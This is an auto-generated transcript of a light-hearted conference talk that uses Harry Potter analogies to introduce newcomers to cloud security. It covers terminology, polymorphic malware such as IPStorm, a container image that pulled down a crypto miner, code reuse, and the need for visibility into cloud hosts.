A Muggle's Guide To Security In The Cloud

hey everyone welcome to a muggles glass a muggle's guide to security in the cloud now before i get started i do want to mention that muggle is never going to be used as a negative term here because to me it's interchangeable with newbie just means that you have powers that you've yet to discover i guess i should go ahead and introduce myself my name is elle marquez and i am the security and linux advocate at inteser yeah what does that mean it means that i get to work with other wizards to like dissect spells and figure out how they were put together but this wasn't always the case before this i was a linux system

administrator and this meant that i was able to learn spells that helped me cast spells around my environment my customers environments and protect them from any attacks that they were gonna face and then i was able to progress my craft to build the cloud itself and then i learned how to actually break spells apart and put them into these little you know con hold on yes you muggles call them containers all right i'm being a dork and that is what you should 100 expect from this presentation what you need to know is my name is elle and i am a wizard and this talk is going gonna be cheesy and i mean over-the-top cheesy and you're

gonna groan and go like oh my god i can't believe she just said that and that is perfect because when we're virtual you're gonna pay attention to other things your kids are gonna walk in trust me i've done recordings where my kids just walk in and start talking to me in the middle of it it's gonna happen to you you're gonna hear it from the side and you'll be like i'm sorry what did she say and you're gonna tune in and you're gonna remember it so when somebody asks you a question you'll be like oh let me tell you what happened and it's going to be great with that said let's get into today's agenda now

today's agenda is really really simple you know we're going to talk about our spell books and we're going to delve into the terminology in it i mean mudbloods and wizards and death eaters oh my and from there we're going to talk about hogwarts i mean this is the key foundation to our world right so we're going to delve in some polyjuice and what are you all here for right you're here to take defense against the dark arts all right maybe i've carried the analogy too long because you probably have no clue what we're going to talk about today so what are we going to talk about today terminology it's at the foundation of any communication that we have in

this industry then we're going to talk about cyber criminals like i hate to say this but they're the only reason we have a job if they didn't exist what would we be doing and we're going to have a serious conversation about what it is that we are most afraid of in cyber security and that's the unknown then a key factor that we don't ever talk about in cyber security and i can tell you i've been in the field for a while and it's not until recently that i've already heard it and that's the concept of code reuse okay not going to geek out now i'll wait till i get to that part and of course we're going to definitely

focus on defense now check that word out for a minute and then check it throughout my presentation a little easter egg because i'm a dork all right let's kick this off with spells and terminology now if you all would please take out your spell books this is really where we need to kick off this class one thing you need to know though is terminology in cyber security is this big alphabet game and you know i don't take myself seriously have you not like figured this out throughout this entire presentation so i'm gonna say things incorrectly i might call things incorrectly i've had a long day i'm gonna stumble over my words and if that's what you're focused on then

you're missing the entire purpose of this conversation because it's going to happen whenever you're working with a team like one of the phrases and i promise you it's not verbatim because i can't remember but it was very similar to it was a senior level tech trying to impress us you know little muggles that were there and saying our company's ec2 instances have been compromised due to cve 2009 oh 21 or oh 21. go look it up legitimately i remember that part we can't uh you know and we can't afford for these attackers to circumvent the certificate chain via dsa and ecdsa keys who's impressed by that you don't impress me by your terminology you really just kind of make me feel bad for

you that you feel you have to speak that way and you're going to be in that situation people are going to be able to impress you with the spells that they cast because they're wizards and you'd never be able to understand you know what you're muggle be proud of it because you can actually say you know what an attack happened on our amazon cloud servers and it was successful so we really should fix our authentication that's it you spoke muggle language and you got everything clear and understandable all right i want you to go ahead and pull out your first spell book right this is your standard book of spells grade oh man i forgot completely to actually

tell the organizers that you are going to need these spell books so we're going to have to edit this talk and we're going to just kind of come back to it um you can attend my you know uh wizard class for cloud security because we'll delve into it but you'll be fine i'll give the links to the organizers and you can get them later all right the whole concept of this book is all around terminology i still use it like i probably used it a few days ago because sometimes you know a term but it's really hard to you know vocalize it to be able to explain it to others and maybe one of the reasons that i actually

you know and tell you about this book maybe a little like lockhart here is if you look really closely on the screen you can see that i was involved in the forward writing of this book and that's because the authors of this book really believed in the campaign that i've started about it's okay to be new just think of it as it's okay to be a muggle the next book is gonna be you're dissecting the hack book and this is what i call the storybook of spells it's because it's an actual story written about two guys who are out there you know like really living the life that we all want to in cyber security kind of

borderlining criminal but you know and they fall into the world of death eaters and as you're going through terminology and as you're reaching spells you can go to the back and you can get a true explanation of how those spells actually impacted the storyline let's get into why you're actually here in class today and that's the attack one key fact in every cyber attack is that there has to be some form of wizard maybe a very talented muggle who hasn't discovered he's a wizard that is involved behind it i don't care what the threat is i don't care how it's been automated somebody wrote the code somebody launched that attack for it to start in

in the security industry we really always like to look at these attackers as the death eaters right it's not just some common wizard it is somebody who has this scary power to be able to get into our systems and cause this havoc i mean this is the face of an attacker right somebody's sitting there with their hoodie up and the guy fox maxed up wow i told you i wasn't gonna be able to talk and they're in this dark room crafting and writing their evil spells writing their malware to compromise our environment it's going to be further from the truth in fact most of the time our attackers look like this and you know honestly

in the regular world outside of the wizard world outside of harry potter there are no true blue of blue bloods pure blood wizards it's all regular humans who have learned a trait who have spent the time to teach grains of salt how to do so much more i mean after all that's all computers started with and unfortunately they've decided that they're going to use their powers from malicious acts you know such as targeting our system such as launching their malicious spells their malicious code and it's truly important for us not to group all these attackers in the same bucket because when we do we really place our companies at the forefront of actually being attacked

because we go into these crazy scenarios of how we're going to attack i mean it's going to be this advanced apt who's going to be targeting our specific systems trying to get you know through all our walls of defense and they're going to be targeting this specific database because they're already going to know and we build these scenarios in our minds and then some common kid you know i don't know 16 7 year old kid 17 year old kid maybe seven playing around on his dad's computer finds like a script that he's like oh this is really cool i should try this does a port scan uh you know on showdown find something launches it

takes down your entire environment if this seems like ual that would never happen like you've gone too far in your examples i'll put a link on it lo punk.com you know charlotte and or you could just google it like i'm sorry i'm getting really excited and nerding out but i want you to google mafia boy aka the boy who took down the internet that's not an example that i just gave you that's a true story so our attackers have to have something that they're targeting right they have to go and actually breach an environment they have to have a goal because hey i can do all the thinking about doing evil things and writing all the spells

it doesn't accomplish anything until it actually occurs so this is where we're going to talk about hogwarts and when you read the books if you've watched the movies you feel like you really understand what that castle is like i could draw it out for you i can tell you what paintings were there i can you know create the world for you because i've read that book 15 times but if you had you actually understand that there's no way for all of us to know that i mean that's highlighted over and over in the book that's true with all of our environments you know we've got schematics and we've got all this planning and we've got

policy books and procedure books and the truth is that technology is changing so quickly the cloud has brought the ability for this agility we have you know companies such as netflix and capital one spinning up containers every 10 seconds every i mean like i've seen talks and presentations where they're talking about it happening like every few seconds tell me how you're going to see visibility in that and it's not just containers it's cloud servers it's using things like lambda functions it's impossible for us to know every single thing that's occurring within our aws cloud now let's add a hybrid cloud we got azure we got jc gks we got google cloud for our kubernetes instances and

we're at a disadvantage so what we fear the most is the unknown i've had conversations with companies and i'm like okay let's break this down we're going to go from the bottom up what are you trying to protect our environments that doesn't tell me anything like the analogy that i use i've used several times my apologies if you've heard it is the fact that that's like taking your car in and you know it's making a noise it's doing whatever and you know and the mechanic asks you know hey what are we working on today and you say ah the car and walk off it's possible for him to figure it out and it's going to take a lot of work

and guess what while we're trying to figure out what that environment is while we're trying to figure out where that data is it's going to shift 15 times so the number one thing that you need to know is what are you trying to protect if it's your data where is it located is it multiple clouds is it in a database is it you know well that's in the database sorry where is that database located are there databases out there that actually aren't being reached by anyone so then they just become a vulnerability someplace for attackers to be able to target because we don't know where it really lays my dear muggles this is where your power

is just going to explode because you're high level wizards they're like oh we know everything we have all these schematics look i have this entire wall of boards that i can see all the spells being crafted where i kind of want to go x-men here and so like where all the mutants are but yeah i'm not gonna i'm not gonna cross streams because that has bad consequences we ask why as muggles we have questions we say wait why did that happen how do i know how do i handle this ticket like it is those questions that are really going to help companies be able to develop a new strategy to protecting to the cloud wizards are still just stuck in their

old ways you know as like infrastructure on premise my dear muggles this is your power and it is stronger than you will actually ever know how do you actually implement how do you use it the same way that harry potter did what he needed was visibility so he was lucky enough to be gifted with a certain map you know to me this was a very exciting part of the book because we finally see you know the story just to me expand much further than you know harry within himself we started seeing the interaction between other characters and this storyline that weren't specifically from his point of view but what happened when he got this map

specifically further in the books not the original like go down pretend that we're just like condensing them all together is he was able to see a character that wasn't supposed to be there i mean he was there obviously like the map was saying but harry had never seen him there'd been no one that ever saw him so what was going on this is exactly where you need to have your mindset because there's a muggle i'm gonna be honest with you and people say i shouldn't say this because it's condescending or whatever but look you're gonna be lost you're not gonna know what's going on and that's okay that's where your questions spur from but it's very intimidating because we see an

issue we look at the map we know it's there but we don't always understand like that's fundamentally the cloud you're not alone in that the cloud is changing you have three months release cycles you have all those deployments that i talked about aws has something as of like 18 000 services available right now and by the time you watch this video it might have completely changed you can't be scared of the unknown because you're going to live in fear your entire career and i don't mean to like your mongrel i don't mean to scare you i'm going to present a very real picture to you of what you're going to see but what i want

you to know is not being afraid accepting that that's gonna happen that's what you need to really level up from going to a muggle to a wizard and it's going to take some time and that's okay because it's taking time it means that you're not taking shortcuts that you're growing with the cloud itself and that you are willing to take the time to understand i i've said it so many times but i need you to listen that is what sets you apart that is where your power is and that really became the reason that i decided to write this talk you know muggle's guide to cloud security because it's not that difficult to understand when you break it down to the basics and

that's exactly where you are right now okay enough you know building you up though i think it's important let's dig into the next important part and that's paulie juice now we all saw polly juice as this very comical concept right oh you know what there was a little hair from the cat and turned into a you know turned into a cat kind of hybrid you know funny funny funny but the fact is that this was the core of the attack that happened and we don't stop to actually make the connection at how powerful this truly was it's not just a comical stance i mean even when they talk you know and they really go into harry trying to mount his defenses

and get information like hey look harry's dressed and hermione's clothes oh ha ha he has this little tight dress like it really i don't brings down the power of this attack and that's exactly what we're doing when it comes to cyber security i mean let's stop take a breath and really analyze this picture but do so through the eyes of a security-minded muggle she'll love how i just kind of keep putting you in different places hey welcome to the cloud welcome to security your job's going to change 15 times and you've got to change your outlook okay so what happened was everybody took some poly some poly juice and they started bringing out the appearance of harry

potter but they didn't get the mannerisms they didn't get the personality they mutated in a sense but they still regained who they were and yes they completely tried to match all the mannerisms and their voices and it was funny but this is actually a process that is happening with attackers there's this concept called polymorphic malware and it's malware that's written in order to continuously change it goes into a system it kind of worms its way throughout other systems you know pivoting and as it does it's constantly changing the code that it is it changes part of its code which then bypasses our signature based detection it changes the way that it acts bypassing our anomaly-based detection

this isn't a new concept polymorphic malware has been around longer than i have in this industry which might not say much but you get the point you can talk to any old neckbeard any longbeard wizard and they'll be able to tell you a story about polymorphic malware the scary thing is that it's still occurring today these type of attacks are occurring every day and we still don't have the defenses that we need to they stop to think about this decades of a certain type of attack and it's still functional today where are we with our security posture this is one of my favorite um kind of malware families to speak about i always feel weird saying that i have favorite

malware because it kind of makes me feel that i'm saying it's okay for attacks to happen i'm not but when you're going to be especially in the dfir in the research center you have to enjoy what you're doing because there's never a true answer it's always another rabbit hole and another rabbit hole and another piece of malware that's changed accept that own it love it and you are going to excel in this industry but what you're seeing here over on the left side where it says family samples is literally that different samples different signatures of malware that we've seen out in the wild and i'll include a link on my website where you can go through and reanalyze the code

and see what else is appearing from there i mean look at what you're seeing right here when it comes to the first scene how many of these strands occurred on the 29th this is how quickly this malware is actually changing and you can see as far back as september 25th september sorry 14th that you're seeing it now one key piece that isn't discussed that by listening to this talk you're gonna have the heads up is that you can't take ancient i'm gonna go with ancient but whatever standardized you know antivirus it worked on our infrastructure and port it over to the cloud because historically you can see that it's failing and how can i make these you know big

accusations and how can i say historically it's right here on the screen that you're looking at move over to the last column over there that says virus total this is how many of the engines on virus total i shouldn't laugh on virus total actually detected this piece of malware okay so starting from the very very bottom we see 47 out of 69 detected okay and the reason the numbers at the end change is because sometimes some engines are available when they're not not the point you can just look at the variables so okay you know what that that's getting too close to half and we did something the very next string the very next piece

of the variant of that malware is now getting 21 out of 60. how are we going down in detection from the time that we've first seen it and you know what look right there like one two three four up zero detection zero this is known malware we know it's happening we've talked about polymorphic now we're like none of this is a secret none of this should even catch our wizards off guard but it is it's right there i'm not making this up you can go run the scan yourself the way that i relate this back to uh harry potter and maybe you dear muggles can actually explain this to our wonderful wizards this way so that

they'll understand is when we're looking at our professor of the dark arts he told everyone almost but follow me along our analogies aren't perfect and two he was just the sad little pathetic man who we should probably feel bad because he can't even really speak but secretly he had powers within him that yo i was surprised when it happened i don't know about you but it really caught me off guard in that part of the movie and that sample that i just showed you and go back to the screen here of ipstorm has an interesting background to it you see ipstorm is actually malware that was written for windows how many of you would be sitting here

going hmm i should probably look for that windows malware on my linux box i promise you now hopefully people are thinking that but about this time they weren't however everything is constantly changing and we've seen the release of a whole new spell language if you want to see it we've seen golang really start to prosper in the cloud environment it is the language that all your cloud native staff ooh fancy word right let's get our spellbook out all it means is applications and things that were written specifically to work well in the cloud like kubernetes like you can i'll add links but they're not even there i'll go add them because it is a very

important term that you need to understand so you can uh impress those wizards out there the i.t storm was actually dubbed from the interplanetary interplanetary storm and it used peer-to-peer p2 networking that that's what it's called impressive right well it didn't matter like that was windows-based system and attackers went okay we have something that's working it's continuously working why are we going to reinvent the wheel let's just take that code change it up a little bit and target linux systems when in azure researchers found it it actually had zero base detection within it and it was running on linux and mac os there is a whole new field that we need to be aware of a

whole new crop of wizards evil wizards death eaters but they're wizards and they are completely owning this field because they're thinking in ways that our wizards right now are not so let that be another lesson to you you need to be more like the death eaters maybe that's not the right way to say this lesson but you need to have creativity you don't need to reinvent the wheel you just need to think outside the box because the power that all of these attackers have is the power to fool us in who they are they don't look as threatening we're looking for death eaters but they're just this underground group that we really don't know about

that much and we really haven't placed that much um priority a priority in catching them i had a very look what was scary situation occurred the other day and i was talking to a company and i'd kind of seen hints of this before but this was the first time that somebody just came out and told me this they said you know what when we have releases in the cloud it needs to happen quickly it needs to be out there as soon as possible because we've made promises to our customers that this function is going to come out understandable right that's what a company does and they're talking about how their deployment cycle comes and they said

eventually we know that there are vulnerabilities in the cloud we know that people know about these vulnerabilities but we have to get that function that part of the product out so we sit down and we look at it what are the what are the benefits that we're gonna have getting this out like you know our customers are gonna be excited we're the first to market we're going to gain money people are going to come and what's the likelihood that we are going to be attacked what's the likelihood that that vulnerability can't be fixed in time fix it in production before we're attacked capability that attackers aren't even gonna know it's there so how much money do we stand to

make versus all of that and how much money do we stand to lose how scary is that that that's your data that's your money and this is the way that they're playing they're choosing not to see that side of the face they're choosing only to focus on that innocent quibbling can't even talk right professor of the dark arts now talking about professors of the dark arts have you ever stopped to think about how many of them really weren't what they thought they were like shouldn't hogwarts have maybe had some kind of bedding or something after the first one got through shouldn't we have some kind of vetting or monitoring after the first time the malware got through

this is probably one of the analogies that isn't even a stretch done a lot of talking this is interesting and one thing i should have mentioned i'm completely gone is that the dark arts teachers that we suspected the most to be the evil ones to be the ones that were crafting bad or crafting uh malicious spells are the ones that were actually trying to help like oh that was very comical to me great writing but we can't take things at face value when it comes to our environments when it comes to the code that we're running because something might look like i really need to dig into this and then we spend hours upon hours and i can tell you really do

delving into this rabbit hole because you know it's something only to find out that it was just a blip in the code the dev ran something and forgot to tell us they updated their code and oh yeah it used up more cpu and what happened during that time a crafty attacker who you know seemed very innocent was able to launch code in our boxes that acted the way that we expected it to and now our data's for sale to the highest bidder simple explanation you know i've gone very high i've gone very low and if you are a muggle who just has a day or two even learning about the world of the wizards it might be a little complicated

that's okay you'll get up to us and you'll be a wizard probably long before i am here's our simplified explanation hogwarts and y'all are probably gonna be laughing if i'm not saying that correctly after this whole day you say it differently but you get the point anyways think of that as our host machine that's our cloud server and that's really where everything happens and one of the clear things that we need to see how i talked about visibility is we don't know everything that's there it's important that we use tooling that helps us really look into this now this tooling can be completely different for each company i'm not telling you what specifically to use but i'm lazy and i know the tools

that i use are simple so that's what i'm going to be showing you so take that and do whatever it is that you want to but by actually being able to see not only what hosts that we have but what's running on them like which one of these are my kubernetes instances what nodes work with them you know what images are running on them you can get visibility to actually be able to monitor if the attacker is in your system this is key i don't remember i said this in this talk before because i say it so many times but behind every attack there has to be malicious code run you can have all of the back doors

available to your castle that you want to and unless somebody walks through them and does something it's not that big of a deal right somebody walks into the wall or sends the walls into the doors and just kind of stands there i mean it sucks that they're there but they're not really doing anything it's when they start monitoring when they start launching and looking into your environments and trying to do things when that spell is cast that you really can monitor them and that there's actually an issue because it goes back into you know we have the great hall and we have hundreds if not thousands of students and they're all supposed to be there but could you go down that list

and name each one of them to me and tell them what they were doing and what you know what house they were a part of like i know like three of these characters all of them were other extras that weren't even given speaking lines but at the same time how many evil wizards how many defense against the dark arts people were allowed to be there i mean to a certain degree when did malfoy become evil we see it happen we know it's happened but do you know the exact moment that it occurred that's what you need visibility to good code could be turned into malicious um i didn't put it in the slide but hey

i just go off the cup there is a piece of malware that was found called docking docky is probably my second favorite example to use so if you hear a bunch of my talks you're going to hear it but it's fascinating to me because docky isn't malicious there's absolutely no malicious code to it his malfoy's you know what he's probably rude you know some of our images like don't work well on containers and we hate it as security folks because it brings up alerts but nothing was ever happening so docky is just a piece of code ran up as an image but within seconds it turned malicious because it was able to use the curl

command and as a former sysadmin i can tell you we use that a lot it is a great troubleshooting uh tool it pulled down malicious code it ran it and like that it was gone now our host has been compromised there's perhaps you know uh the one that uh we discovered once again zero based detection was running a crypto miner like all of this without really anything alerting to you and alerting you to what it occurred it's not like i said before shouldn't there been some like vetting process on who was going to take that position if it kept being taken by people who are trying to kill harry just saying which brings me to

mad-eye movie uh like i am i the only person that is i'm reading it going there's something not right with this guy but he's trusted he's written all these books people can verify who he is like we back this teacher he's going to be great and you're going to learn a lot about it that's what you're seeing in polymorphic malware like this is one of the examples that i like to use because this goes completely to polyjuice you have code which part of it looks like it's trusted right i mean we've got normal libraries that we'd expect to see on our system but all of a sudden we start seeing pieces of code that really

should kind of go like hey i've got something on my system and it's running like malicious libraries like why didn't that trigger us into investigating it hey this shares a lot of code with known malware called xm rig miner why didn't that trigger us to investigate it i can go all the way up this goes back into the fact that our traditional defenses that which our wizards are used to using aren't enough and you this is where you're going to shine you're going to bring in new ideas new ways of making new questions to ask and that's what's going to help all of our defenses get stronger because you're going to be able to say you know what we

need to know what's running in our boxes and i'm going to like tell you people are going to look at you know what like it's not a conversation that we have anymore because after all we have cloud security products you know we have dementors flying around the castle helping protect because we know an attack is coming like at some point you have to own your own defenses and know what's going on and that's where our security team comes in we're trying our hardest and you keep hearing all these statistics about how you know we don't have enough people in cyber security and others have said it but really my belief is that we don't have enough people with the curiosity to

really kind of stand up to the wizards to be in that interview and just own how sometimes your lack of knowledge is the best thing that's going to bring you your strengths it okay i that's a whole another talk so i'm just completely gonna stop here and say that your assets and your most valuable possession as part of the security team is going to be having visibility into everything if you're the guy that can go in or girl not bad go in and look and say you know what here are our hosts we've got clean code we're good we can focus on the network awesome if there is an attack happening and people are delving into the network

and they're digging through and what firewalls and you can pull up your tool and be like that's great guess what they're already in the host they're running commands our data is gone wow like i'm okay i'm geeking out now like you don't understand how different that is from the current status quo okay here i am last one i swear is that a lot of times in the security industry we believe that because we get code because we get applications from a trusted source that we're fine you pulled up your image from you know aws you're running ubuntu directly you went to the site and you launched it you're running your node.js application specifically from the repository

go google no js compromise that's it just go google it i will let you make that discovery completely on your own did you know that the linux kernel was compromised attackers got into it and to this day they can't tell you how long it happened or what it was there estimates about six months but they're not sure there have been so many repositories now uh i'll post links just to make sure i get these right but i believe it's the apache repository that's been owned three times they know what happened they have an estimate of what occurred but you're following that trusted source and running the code on your system and sometimes even as you're running the

code new cves are found what was it uh 18 300 and something cves were released last year and like 4 000 of them were labeled as critical i can't tell you what cvs came out this month i can't even tell you they've been patched but if you know and you have whatever tool it is that you choose to know and you can have these conversations with your devs then you are worth your weight in gold when it comes to this industry okay i've said a lot and i'm happy to answer questions because i know i just did like this verbal dump on you and hopefully you saw a lot of it is encouraging hopefully you've been taking

notes and you know things that you want to you know go out and google but there's no better way to learn than to ask questions and that's why i'm here so you know jump on the discord ask i promise you i will do my best to answer it and if i don't know do you remember the very beginning that i said i work directly with researchers i will find you the answer that you need because the wizarding world is open to everyone including you muggles so with that let's jump into questions that's it

you